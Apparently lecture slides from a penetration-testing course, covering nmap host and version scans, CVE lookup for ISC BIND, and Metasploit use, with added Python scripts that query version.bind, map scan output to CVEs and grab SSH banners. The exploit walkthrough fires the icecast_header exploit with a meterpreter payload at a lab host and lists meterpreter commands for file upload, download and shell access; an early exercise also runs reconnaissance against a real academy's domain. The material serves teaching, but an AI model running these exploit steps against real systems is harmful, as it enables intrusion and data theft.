Penetration Testing Part 2

Review
- 2-minute exercise:
- RECON ONLY
- Find three IP addresses at the U.S. Merchant Marine Academy

Google: "U.S. Merchant Marine Academy" to find the URL
site:usmma.edu
site:usmma.edu -www.usmma.edu
nslookup blackboard.usmma.edu
nslookup ...
Review
- 1-minute exercise:
- Use nmap to find all of the live hosts in your group's network (10.10.1.0/24)

nmap -sn 10.10.1.*
(-sn: host discovery only, no port scan)
Review
- 1-minute exercise:
- Use nmap to find all of the open ports on 10.10.1.15.
- Looking at the open ports, what type of server is this?

nmap 10.10.1.15
Answer: a DNS server (port 53 is open)
Review
- 2-minute exercise:
- Use nmap to find the version of the DNS server running on 10.10.1.15, port 53.
- ssh into 10.10.1.15 and run this command on the host to verify what the network probe reported:

/usr/sbin/named -v

sudo nmap -sV 10.10.1.15
Answer: ISC BIND 9.8.1-P1
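What nmap -sV actually does to get that answer is send BIND's own version query: a TXT record for the name version.bind in the CHAOS class (the same thing dig @10.10.1.15 version.bind txt chaos sends). The script below is an added example, not part of the original slides: it builds that query by hand, parses the reply (including the name-compression pointer BIND uses in the answer), and ships with a constructed response for offline use. The lab host and port are assumed; the TXID value is arbitrary.

```python
import socket
import struct

TXID = 0x1234  # arbitrary transaction id; echoed back by the server


def build_version_bind_query(txid=TXID):
    """DNS query for TXT version.bind in class CHAOS (QCLASS 3), RD flag set."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # 1 question, no RRs
    qname = b"\x07version\x04bind\x00"                          # labels: version, bind
    return header + qname + struct.pack(">HH", 16, 3)           # QTYPE TXT=16, QCLASS CH=3


def _read_name(data, off):
    """Decode a possibly compressed name; return (dotted name, offset after it)."""
    labels, jumped, end, hops = [], False, None, 0
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:                 # compression pointer (RFC 1035 4.1.4)
            if not jumped:
                end = off + 2                     # name occupies 2 bytes in this record
            off = ((length & 0x3F) << 8) | data[off + 1]
            jumped, hops = True, hops + 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_version_bind_response(data, txid=TXID):
    """Return the TXT strings in the answer section, or [] if refused/empty."""
    rid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    if flags & 0x000F:                            # RCODE != 0, e.g. REFUSED when hidden
        return []
    off = 12
    for _ in range(qd):                           # skip the echoed question(s)
        _, off = _read_name(data, off)
        off += 4                                  # QTYPE + QCLASS
    txts = []
    for _ in range(an):
        _, off = _read_name(data, off)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        rdata, off = data[off:off + rdlen], off + rdlen
        if rtype == 16 and rclass == 3:           # TXT RDATA: one or more <len><chars>
            p = 0
            while p < len(rdata):
                n = rdata[p]
                txts.append(rdata[p + 1:p + 1 + n].decode("ascii", "replace"))
                p += 1 + n
    return txts


def query_version_bind(host, port=53, timeout=3.0):
    """Send the query over UDP and return the version strings the server gives."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_version_bind_query(TXID), (host, port))
        data, _ = s.recvfrom(512)
    return parse_version_bind_response(data, TXID)


# Constructed reply (not a real capture) shaped like BIND's answer: question
# echoed, then one TXT record whose name is a pointer to offset 12.
SAMPLE_RESPONSE = (
    struct.pack(">HHHHHH", TXID, 0x8580, 1, 1, 0, 0)          # QR|AA|RD|RA, 1 q, 1 answer
    + b"\x07version\x04bind\x00" + struct.pack(">HH", 16, 3)
    + b"\xc0\x0c" + struct.pack(">HHIH", 16, 3, 0, 9)          # TXT, CH, TTL 0, RDLENGTH 9
    + b"\x08" + b"9.8.1-P1"
)
# Constructed REFUSED reply (RCODE 5), what a server with the version hidden returns.
SAMPLE_REFUSED = (
    struct.pack(">HHHHHH", TXID, 0x8185, 1, 0, 0, 0)
    + b"\x07version\x04bind\x00" + struct.pack(">HH", 16, 3)
)

if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else None   # e.g. 10.10.1.15 in the lab
    print(query_version_bind(host) if host else parse_version_bind_response(SAMPLE_RESPONSE))
```

Caveat for the exercise: the string comes from whatever the administrator put in the `version` option of named.conf, so it can be hidden (the REFUSED case above) or set to a misleading value. That is why the slide has you confirm with `named -v` on the box itself.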
Phase 3 - Penetration
- The goal of this step is to obtain a shell or run code on a remote machine.
- 90% research
- 10% attack
- Method:
  1. Pick a host to exploit
  2. Pick a running service on that host to exploit
  3. Find out the version of the service
  4. Find an exploit that works against that version
  5. Run the exploit
  6. Repeat as required
Metasploit
- Exploitation framework used by pentesters and attackers alike
- Ships with modules for known security vulnerabilities
- Three types of modules used here:
  - exploits: code that triggers a vulnerability (e.g. overflows a buffer) to break into a server
  - payloads: code the exploit delivers to provide access to the OS, often a shell
  - auxiliary: misc functions, usually to retrieve information such as version numbers
CVE
- Common Vulnerabilities and Exposures (CVE)
- Reference system of identifiers for publicly known vulnerabilities
- Managed by the MITRE Corporation
- Funded by DHS's National Cyber Security Division
- http://cve.mitre.org
- Info is mirrored on multiple other sites, e.g.:
  - http://cvedetails.com
CVE
- When in doubt, ask Google:
- Google: cve isc bind 9.8.1-P1
  - CVE-2012-1667
  - CVE-2012-1033
  - CVE-2012-5688
  - CVE-2013-2266
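Steps 3 and 4 of the method above (read the version off the scan, then find what is known about it) are easy to automate once you are doing it for more than one host. The script below is an added example, not part of the original slides: it parses nmap's normal -sV output into one record per open port, looks each version string up in a table, and includes a comparator for ISC-style version numbers such as 9.8.1-P1 so a "fixed in" version from an advisory can be tested. The nmap output is constructed (only the BIND line matches what the slides report), and the lookup table holds only the four CVE IDs the Google result on this slide lists; the fixed-in version used in the comparator is whatever you supply, none is asserted here.

```python
import re

# Constructed sample of `nmap -sV 10.10.1.15` output; not a real capture.
SAMPLE_NMAP_SV = """\
Nmap scan report for 10.10.1.15
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
53/tcp open  domain  ISC BIND 9.8.1-P1
"""

# Version string -> CVE ids. Seeded only with the Google result the slide
# reports for "cve isc bind 9.8.1-P1"; extend with your own search results.
KNOWN_CVES = {
    "ISC BIND 9.8.1-P1": ["CVE-2012-1667", "CVE-2012-1033",
                          "CVE-2012-5688", "CVE-2013-2266"],
}

# Matches nmap port lines: "53/tcp open  domain  ISC BIND 9.8.1-P1"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap_sv(text):
    """One dict (port, proto, state, service, version) per open port."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"].strip()
            found.append(d)
    return found


def bind_version_key(version):
    """'9.8.1-P1' -> (9, 8, 1, 1). A release without -Pn is patch level 0,
    so 9.8.1 < 9.8.1-P1 < 9.8.2, which is how ISC orders them."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-P(\d+))?", version)
    if not m:
        raise ValueError("unrecognised BIND version: %r" % version)
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_older_than(version, fixed_in):
    """True if `version` predates an advisory's fixed-in release."""
    return bind_version_key(version) < bind_version_key(fixed_in)


def candidate_cves(text):
    """Join steps 3 and 4: map 'port/proto' -> (version string, CVE ids)."""
    hits = {}
    for svc in parse_nmap_sv(text):
        cves = KNOWN_CVES.get(svc["version"])
        if cves:
            hits["%d/%s" % (svc["port"], svc["proto"])] = (svc["version"], cves)
    return hits


if __name__ == "__main__":
    for port, (ver, cves) in candidate_cves(SAMPLE_NMAP_SV).items():
        print(port, ver, ", ".join(cves))
```

Exact-string lookup is deliberately strict: nmap's version strings vary in detail (distribution suffixes, protocol notes in parentheses), so anything not found still has to be searched by hand, which is the 90% research the slide talks about.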
Metasploit – find version of server
$ msfconsole
> search ssh
> use auxiliary/scanner/ssh/ssh_version
> show options
> set RHOSTS 14.29.4.105
> exploit

- Similar to: nmap -sV -p22 14.29.4.105
- For auxiliary modules `run` is the usual command; `exploit` is accepted as an alias.
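All ssh_version (and nmap -sV on port 22) does here is read the identification string an SSH server sends as soon as you connect, "SSH-protoversion-softwareversion [comments]" per RFC 4253. The script below is an added example, not part of the original slides or of Metasploit: it parses that string, grabs it from a live host, and includes a loopback server that replays a constructed banner so it can be run with nothing else on the network. The banner text, host names and ports are assumptions.

```python
import socket
import threading

# Constructed banner for the loopback demo server; not captured from a real host.
CONSTRUCTED_BANNER = b"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1\r\n"


def parse_ssh_banner(line):
    """Split 'SSH-protoversion-softwareversion SP comments CR LF' (RFC 4253
    section 4.2) into its parts; raise ValueError on anything else."""
    line = line.rstrip("\r\n")
    if not line.startswith("SSH-"):
        raise ValueError("not an SSH identification string: %r" % line)
    ident, _, comments = line.partition(" ")
    parts = ident.split("-", 2)               # 'SSH', protoversion, softwareversion
    if len(parts) != 3 or not parts[1] or not parts[2]:
        raise ValueError("malformed identification string: %r" % line)
    return {"proto": parts[1], "software": parts[2], "comments": comments}


def grab_ssh_banner(host, port=22, timeout=3.0):
    """Connect and read lines until the identification string arrives.
    RFC 4253 lets a server send other text lines first, so skip those."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        with s.makefile("rb") as f:
            for _ in range(20):
                raw = f.readline()
                if not raw:
                    break
                line = raw.decode("ascii", "replace")
                if line.startswith("SSH-"):
                    return parse_ssh_banner(line)
    raise ValueError("no SSH identification string from %s:%d" % (host, port))


def start_fake_sshd(banner=CONSTRUCTED_BANNER):
    """Loopback server that sends one banner and hangs up; returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # python3 sshver.py 14.29.4.105 [port]
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 22
    else:                                      # no target: talk to the fake server
        target, port = "127.0.0.1", start_fake_sshd()
    print(grab_ssh_banner(target, port))
```

The software field is the interesting one for step 3 of the method; note that the comments field is where distributions put their package revision (Debian-5ubuntu1 in the constructed banner), which matters because a distribution may have backported a fix without changing the upstream version number.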
Exploit walkthrough
- Target machine is 14.29.4.100

nmap -O 14.29.4.100     # OS fingerprint (needs root)
nmap -sV 14.29.4.100    # service versions

Google: cve icecast

$ msfconsole
> search icecast
> use exploit/windows/http/icecast_header
> show options
> set RHOST 14.29.4.100
> set PAYLOAD windows/meterpreter/bind_tcp
> exploit

- bind_tcp makes the payload listen on the target and waits for us to connect in, so it only works if nothing filters inbound connections to that port; a reverse_tcp payload (the target connects back to our LHOST) is the usual alternative.
Meterpreter basics
- Meterpreter is an in-memory command shell delivered as our payload
- Useful commands:
  getwd                  # show the current working directory
  sysinfo                # print system info (name, OS, etc.)
  ipconfig               # network info
  ps                     # list all processes
  upload <src> <dest>    # copy a file to the target
  download <src> <dest>  # copy a file from the target
  shell                  # obtain a Windows shell (Win hosts only)